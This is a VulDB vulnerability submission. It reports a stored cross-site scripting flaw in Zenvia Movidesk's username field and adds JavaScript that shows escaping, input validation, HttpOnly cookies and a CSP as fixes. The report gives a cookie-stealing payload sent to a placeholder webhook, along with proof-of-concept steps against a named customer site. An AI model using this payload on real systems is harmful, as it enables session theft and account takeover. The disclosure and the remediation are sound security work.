Submit #486023: zenvia movidesk 25.01.15.86c796efe6 Cross Site Scripting

Title: zenvia movidesk 25.01.15.86c796efe6 Cross Site Scripting
Description:

Vulnerability Summary
A stored XSS vulnerability was identified in Zenvia's Movidesk system. The flaw occurs in the username field, allowing the injection of malicious code. When an attacker changes the profile name to contain an XSS payload, the code is stored in the system and executed automatically when other users access the ticket viewing page, enabling a zero-click Account Takeover (ATO) attack.

Vulnerability Details
Vulnerable endpoint (profile editing): https://service.sigmatelecom.com.br/Account/EditProfile
Endpoint where the XSS is triggered (ticket view): https://service.sigmatelecom.com.br/Ticket
Payload used: <img src="https://your-webhook.com/?cookie=" + `${document.cookie}`>

Impact
- Automatic execution of malicious code upon viewing tickets
- Theft of session cookies, enabling Account Takeover without user interaction (0-click)
- Compromise of accounts with access to ticket data
- Privilege escalation if the attacker gains access to administrator credentials

Recommendations
To mitigate this vulnerability, it is recommended to:
- Input sanitization: implement strict filtering and validation of user input in the "Username" field.
- Output escaping: ensure that all displayed data is properly escaped to prevent code execution.
- HttpOnly cookies: configure session cookies with the HttpOnly flag to prevent JavaScript access.
- Content Security Policy (CSP): implement a restrictive CSP to mitigate unauthorized code execution.
- Security audits: conduct regular security testing to identify similar vulnerabilities.

Proof of Concept (PoC)
1. Access the profile editing endpoint: https://service.sigmatelecom.com.br/Account/EditProfile
2. Change the username to the following payload: <img src="https://your-webhook.com/?cookie=" + `${document.cookie}`>
3. Save the changes.
4. Access the ticket page: https://service.sigmatelecom.com.br/Ticket
5. Observe that the payload is executed and cookies are sent to the webhook.
Source: https://service.sigmatelecom.com.br/Ticket
User: y4g0 (UID 80480)
Submission: 21.01.2025 01:15 (1 year ago)
Moderated: 02.02.2025 08:54 (12 days later)
Status: Accepted
VulDB Entry: 294362 [Zenvia Movidesk up to 25.01.22 Profile Editing /Account/EditProfile Username Cross Site Scripting]
Points: 17
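The recommendations in the description above (output escaping, input validation, HttpOnly session cookies, a restrictive CSP) are generic, so the following shows what they look like when applied to a profile name that is later rendered on a ticket page. This is an added illustration, not code from the submission, from VulDB, or from Zenvia/Movidesk; all function names are hypothetical, the rendering template is invented, and the sample username is the payload string quoted in the report.

```javascript
// Added example: hardening a stored profile name against the XSS pattern described above.
// Not the vendor's code. Function names and the template are hypothetical.

// Sample input, taken verbatim from the payload quoted in the submission.
const SAMPLE_USERNAME = '<img src="https://your-webhook.com/?cookie=" + `${document.cookie}`>';

// Output escaping: encode the characters that can close a text node or attribute value.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable rendering: the stored username is concatenated straight into the ticket view,
// so a username containing markup becomes part of the page's DOM.
function renderTicketAuthorUnsafe(username) {
  return `<div class="ticket-author">${username}</div>`;
}

// Hardened rendering: same template, untrusted value escaped at output time.
function renderTicketAuthor(username) {
  return `<div class="ticket-author">${escapeHtml(username)}</div>`;
}

// Input validation for the "Username" field: letters, digits and a few separators, 1-64 chars.
// Defence in depth only; output escaping is what actually prevents the injection.
const USERNAME_RE = /^[\p{L}\p{N} ._'-]{1,64}$/u;
function isValidUsername(username) {
  return USERNAME_RE.test(username);
}

// Session cookie attributes: HttpOnly keeps the session id out of document.cookie,
// so a script that does run cannot read it; Secure and SameSite limit exposure further.
function sessionCookieHeader(sessionId) {
  return `session=${encodeURIComponent(sessionId)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// A restrictive CSP for the ticket page: no inline script, and images, scripts and fetches
// only from the application's own origin, so an injected <img> cannot reach a third-party host.
const CONTENT_SECURITY_POLICY =
  "default-src 'none'; script-src 'self'; style-src 'self'; img-src 'self'; " +
  "connect-src 'self'; base-uri 'none'; frame-ancestors 'none'";

// Returns true if the rendered author fragment still carries an unescaped tag from the username.
function leaksMarkup(renderFn, username) {
  const inner = renderFn(username).replace(/^<div class="ticket-author">/, '').replace(/<\/div>$/, '');
  return /<[a-zA-Z!/]/.test(inner);
}

// Stand-alone demo.
console.log('unsafe leaks markup:', leaksMarkup(renderTicketAuthorUnsafe, SAMPLE_USERNAME));
console.log('hardened leaks markup:', leaksMarkup(renderTicketAuthor, SAMPLE_USERNAME));
console.log('valid username:', isValidUsername(SAMPLE_USERNAME));
console.log(sessionCookieHeader('example-session-id'));
console.log(CONTENT_SECURITY_POLICY);
```

The point of the pairing is the order of defences: escaping at render time removes the vulnerability, validation shrinks the attack surface for fields that have no business containing markup, and HttpOnly plus CSP limit what a payload could do if another injection point is ever found.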
